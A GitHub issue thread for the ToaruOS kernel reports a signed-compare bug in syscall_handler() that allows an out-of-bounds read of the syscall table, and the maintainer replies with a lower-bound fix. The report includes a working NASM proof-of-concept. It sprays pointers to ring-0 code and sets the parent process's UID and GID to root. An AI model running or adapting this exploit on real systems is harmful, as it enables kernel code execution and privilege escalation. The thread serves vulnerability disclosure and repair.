### ISSUE TITLE
Signed compare of syscall number in syscall_handler() leads to kernel mode arbitrary code execution and privilege escalation

### ISSUE THREAD

**Issue by unknown-1-0** [klange/toaruos#308]
https://github.com/klange/toaruos/blob/e03e2ff189c3d424701a2dd10dc7ffbd55a3f346/kernel/arch/aarch64/arch.c#L340
https://github.com/klange/toaruos/blob/e03e2ff189c3d424701a2dd10dc7ffbd55a3f346/kernel/arch/x86_64/user.c#L283
https://github.com/klange/toaruos/blob/e03e2ff189c3d424701a2dd10dc7ffbd55a3f346/kernel/sys/syscall.c#L1303
```c
static long num_syscalls = sizeof(syscalls) / sizeof(*syscalls);

void syscall_handler(struct regs * r) {

	this_core->current_process->syscall_registers = r;

        ...

	long result;

	if (arch_syscall_number(r) >= num_syscalls) {
		result = -EINVAL;
		goto _finish_syscall;
	}

	scall_func func = syscalls[arch_syscall_number(r)];
	result = func(
		arch_syscall_arg0(r), arch_syscall_arg1(r), arch_syscall_arg2(r),
		arch_syscall_arg3(r), arch_syscall_arg4(r));


_finish_syscall:
        ...
}
```
Both `num_syscalls` value and `arch_syscall_number()`'s return value are signed long values, so comparison between them is signed, and if `arch_syscall_number(r)` < 0, this leads to check bypass and out-of-bounds read of a function pointer value. Arbitrary code execution can be achieved by OR'ing the index to a desired pointer with `1 << 63` (which is 0x8000000000000000), which makes CPU think index is a negative value.

PoC:
```nasm
bits 64

; syscall table base address without KASLR
%define SYSCALL_TABLE_BASE 0x134220
%define SYS_EXT 0

section .text

lea rax, [pointer_spray-SYSCALL_TABLE_BASE]
shr rax, 3
; make the CPU think it's a negative number
; this bit will be shifted away when multiplying by pointer size
mov rbx, 1<<63
or rax, rbx
syscall

mov rbx, rax
mov rax, SYS_EXT
syscall

ring0_code:

mov rax, gs:[0]

mov rax, [rax+0x60] ; get the tree entry of this process
mov rax, [rax+0x10] ; go to the process that started the exploit
mov rax, [rax]            ; get the process struct of the parent

; set UID and GID of the parent to root
mov qword [rax+0x1c], 0
mov qword [rax+0x24], 0

xor rax, rax
ret

section .data
times 0x100*0x1000 dq ring0_code ; just in case SYSCALL_TABLE_BASE is actually different on a current system
pointer_spray:
times 0x100*0x1000 dq ring0_code ; cover all KASLR range

```

![screenshot](https://github.com/user-attachments/assets/279e7ae8-51c7-4e1d-8979-b37e1cc6cad0)

Compile with: `nasm -f elf64 exploit.asm; ld -o exploit exploit.asm`

**Comment by klange** [comment]
I had to dig into the separate `misaka` git tree to figure out what happened here:

`arch_syscall_number` used to be declared in `kernel/sys/syscall.c` with a mismatched return type - it was treated as `unsigned` despite being defined otherwise. When all of the `arch_...` register functions were added to a header, that illegal cheat disappeared, but the usage was never changed to account for it: https://github.com/toaruos/misaka/commit/a7d7272bcded8f3dace2cc0ecc240fd60cfbdc1d#diff-c99615d39f2fa95509d64afcc5a34d37e5585e9fbb872a6cc2a4b6eaac76562aL20

I think the correct fix here is to accept that `arch_syscall_number` is signed and also check the lower bound:

```c
	if (arch_syscall_number(r) < 0 || arch_syscall_number(r) >= num_syscalls) {
```
